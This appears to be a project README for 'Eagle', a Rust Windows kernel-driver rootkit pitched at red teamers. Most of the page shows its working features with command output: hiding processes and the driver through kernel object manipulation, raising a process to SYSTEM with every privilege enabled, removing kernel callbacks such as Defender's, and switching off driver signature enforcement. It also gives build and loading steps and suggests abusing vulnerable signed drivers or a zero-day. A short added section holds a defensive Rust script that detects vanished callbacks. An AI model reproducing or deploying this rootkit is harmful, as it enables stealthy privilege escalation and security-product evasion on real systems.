Rusty Rootkit: Windows Kernel Driver in Rust for Red Teamers

Tags: Utilities, eagle-rs
Overview

Windows Kernel Driver in Rust (Rusty Rootkit) for Red Teamers

Features (Development in progress)

  • Protect / unprotect process (Done)
  • Elevate to NT AUTHORITY\SYSTEM and Enable all token privileges (Done)
  • Hide process (Done)
  • Hide driver (Done)
  • Enumerate loaded kernel modules (Done)
  • Enumerate / remove kernel callbacks
    • PsSetCreateProcessNotifyRoutine (Done)
    • PsSetCreateThreadNotifyRoutine (Todo)
    • PsSetLoadImageNotifyRoutine (Todo)
    • CmRegisterCallbackEx (Todo)
    • ObRegisterCallbacks (Todo)
  • DSE enable/disable (Done)

Usage

PS C:\Users\memn0ps\Desktop> .\client.exe -h
client 0.1.0

USAGE:
    client.exe <SUBCOMMAND>

OPTIONS:
    -h, --help       Print help information
    -V, --version    Print version information

SUBCOMMANDS:
    callbacks
    driver
    dse
    help         Print this message or the help of the given subcommand(s)
    process
client.exe-process

USAGE:
    client.exe process --name <PROCESS> <--protect|--unprotect|--elevate|--hide>

OPTIONS:
    -e, --elevate           Elevate all token privileges
    -h, --help              Print help information
        --hide              Hide a process using Direct Kernel Object Manipulation (DKOM)
    -n, --name <PROCESS>    Target process name
    -p, --protect           Protect a process
    -u, --unprotect         Unprotect a process
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks -h
client.exe-callbacks

USAGE:
    client.exe callbacks <--enumerate|--patch <PATCH>>

OPTIONS:
    -e, --enumerate        Enumerate kernel callbacks
    -h, --help             Print help information
    -p, --patch <PATCH>    Patch kernel callbacks 0-63
PS C:\Users\memn0ps\Desktop> .\client.exe dse -h
client.exe-dse

USAGE:
    client.exe dse <--enable|--disable>

OPTIONS:
    -d, --disable    Disable Driver Signature Enforcement (DSE)
    -e, --enable     Enable Driver Signature Enforcement (DSE)
    -h, --help       Print help information
PS C:\Users\memn0ps\Desktop> .\client.exe driver -h
client.exe-driver

USAGE:
    client.exe driver <--hide|--enumerate>

OPTIONS:
    -e, --enumerate    Enumerate loaded kernel modules
    -h, --help         Print help information
        --hide         Hide a driver using Direct Kernel Object Manipulation (DKOM)

Enumerate and Patch Kernel Callbacks

PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 11
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")
[10] 0xffffbd8d43afb63f ("Eagle.sys")
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --patch 10
[+] Callback patched successfully at index 10
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 10
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")

Protect Process

PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --protect
[+] Process protected successfully 8248

Elevate to NT AUTHORITY\System and Enable All Token Privileges

PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION
----------------

User Name          SID
================== ==============================================
windows-10-vm\user S-1-5-21-3694103140-4081734440-3706941413-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --elevate
[+] Tokens privileges elevated successfully 6376
PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

PS C:\Users\memn0ps\Desktop>

Enable / Disable Driver Signature Enforcement (DSE)

PS C:\Users\memn0ps\Desktop> .\client.exe dse --enable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) enabled: 0x6
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8  06 
PS C:\Users\memn0ps\Desktop> .\client.exe dse --disable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) disabled: 0xe
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8  0e

Hide Process

PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --hide
[+] Process is hidden successfully: 6376

Hide Driver

Hidden from ZwQuerySystemInformation and PsLoadedModuleList

PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 185
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[184] 0xfffff80055720000 "Eagle.sys"
[+] Loaded modules enumerated successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --hide
[+] Driver hidden successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 184
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[+] Loaded modules enumerated successfully
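The callback and driver listings above are a natural baseline for a defender-side integrity check: entries in these arrays should not silently disappear. This added example (not eagle-rs project code) parses both output formats printed by `client.exe callbacks --enumerate` and `client.exe driver --enumerate`, diffs a baseline snapshot against a later one, and reports what vanished; the `WATCHED` module list is an assumption built from the names visible above.

```rust
// Added example (not eagle-rs project code): parse the enumeration output
// of `client.exe callbacks --enumerate` / `client.exe driver --enumerate`,
// diff a baseline against a later snapshot and flag entries that vanished.
use std::collections::BTreeSet;

/// One enumerated entry: list index, kernel address, owning module.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Entry {
    pub index: usize,
    pub address: u64,
    pub module: String,
}

/// Parses `[3] 0xffffbd8d3db2bf8f ("WdFilter.sys")` (callback format) and
/// `[0] 0xfffff80058c00000 "ntoskrnl.exe"` (module format). Prompts, totals,
/// `[+]` status lines and `<..OMITTED..>` markers are skipped.
pub fn parse(output: &str) -> Vec<Entry> {
    output
        .lines()
        .filter_map(|line| {
            let (idx, rest) = line.trim().strip_prefix('[')?.split_once(']')?;
            let (addr, name) = rest.trim_start().split_once(' ')?;
            let address = u64::from_str_radix(addr.strip_prefix("0x")?, 16).ok()?;
            let module = name.trim_matches(|c: char| "()\" ".contains(c)).to_string();
            Some(Entry { index: idx.parse().ok()?, address, module })
        })
        .collect()
}

/// Entries in `baseline` whose address no longer appears in `current`.
/// Matching on address rather than index matters because the array is
/// compacted after a removal, so every index after the removed slot shifts.
pub fn removed<'a>(baseline: &'a [Entry], current: &[Entry]) -> Vec<&'a Entry> {
    let live: BTreeSet<u64> = current.iter().map(|e| e.address).collect();
    baseline.iter().filter(|e| !live.contains(&e.address)).collect()
}

/// Modules a defender never expects to lose a callback or unload silently.
/// Names are the ones visible in the enumeration above; the list itself is
/// an assumption to be tuned for the EDR/AV actually deployed.
pub const WATCHED: &[&str] = &["WdFilter.sys", "MpKslDrv.sys", "CI.dll", "cng.sys"];

/// Turns removed entries into findings: watched security modules are
/// critical; any other unexplained removal is still worth a ticket.
pub fn findings(gone: &[&Entry]) -> Vec<String> {
    gone.iter()
        .map(|e| {
            let sev = if WATCHED.contains(&e.module.as_str()) { "CRITICAL" } else { "WARN" };
            format!("{}: {} entry at {:#x} (was index {}) disappeared",
                    sev, e.module, e.address, e.index)
        })
        .collect()
}

fn main() {
    // Constructed sample: a trimmed copy of the before/after callback output above.
    let before = "[8] 0xffffbd8d3fa37cff (\"vm3dmp.sys\")\n[9] 0xffffbd8d3f97104f (\"peauth.sys\")\n[10] 0xffffbd8d43afb63f (\"Eagle.sys\")";
    let after = "[8] 0xffffbd8d3fa37cff (\"vm3dmp.sys\")\n[9] 0xffffbd8d3f97104f (\"peauth.sys\")";
    for f in findings(&removed(&parse(before), &parse(after))) {
        println!("{}", f);
    }
}
```

Run it periodically from a trusted host and alert on any CRITICAL line; on the sample above it reports the Eagle.sys entry as a WARN, since that module is not on the watched list.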

Install Rust

To start using Rust, download the installer, then run the program and follow the onscreen instructions. You may need to install the Visual Studio C++ Build tools when prompted to do so.

Install and change to Rust nightly

rustup toolchain install nightly
rustup default nightly

Install cargo-make

cargo install cargo-make

Install WDK/SDK

  • Step 1: Install Visual Studio 2019
  • Step 2: Install Windows 11 SDK (22000.1)
  • Step 3: Install Windows 11 WDK

Build Driver

Change directory to .\driver\ and build the driver:

cargo make sign

Build Client

Change directory to .\client\ and build the client:

cargo build

Enable Test Mode or Test Signing Mode

bcdedit /set testsigning on

[Optional] Debug via Windbg

bcdedit /debug on
bcdedit /dbgsettings net hostip:<IP> port:<PORT>

Create / Start Service

You can use Service Control Manager or OSR Driver Loader to load your driver.

PS C:\Users\memn0ps> sc.exe create Eagle type= kernel binPath= C:\Windows\System32\Eagle.sys
[SC] CreateService SUCCESS
PS C:\Users\memn0ps> sc.exe query Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\Users\memn0ps> sc.exe start Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :
PS C:\Users\memn0ps> sc.exe stop Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Currently, this driver does not support manual mapping. An alternative way to load the driver is to manually map it by exploiting a known CVE in a signed driver that is already loaded, such as the Intel or Capcom drivers, although vulnerable drivers are easily flagged by EDRs or anti-cheat (AC) products.

Otherwise, you can always obtain an extended validation (EV) code signing certificate from Microsoft, which goes through a "vetting" process, or use a 0-day, which is really up to you lol.

Note

A better way to write Windows kernel drivers in Rust is to create bindings, as shown in the references below. However, using someone else's bindings hides the underlying functionality, which is why I wrote this the classic way (unless, of course, you create your own bindings). I plan to refactor the code in the future, but for now it will be a bit messy and incomplete.

I made this project for fun and because I really like Rust and Windows internals. It is obviously not perfect or finished yet. If you would like to learn more about Windows kernel programming, feel free to check out the references below. The preferred safe and robust way of writing Windows kernel drivers in Rust is shown here:

References and Credits
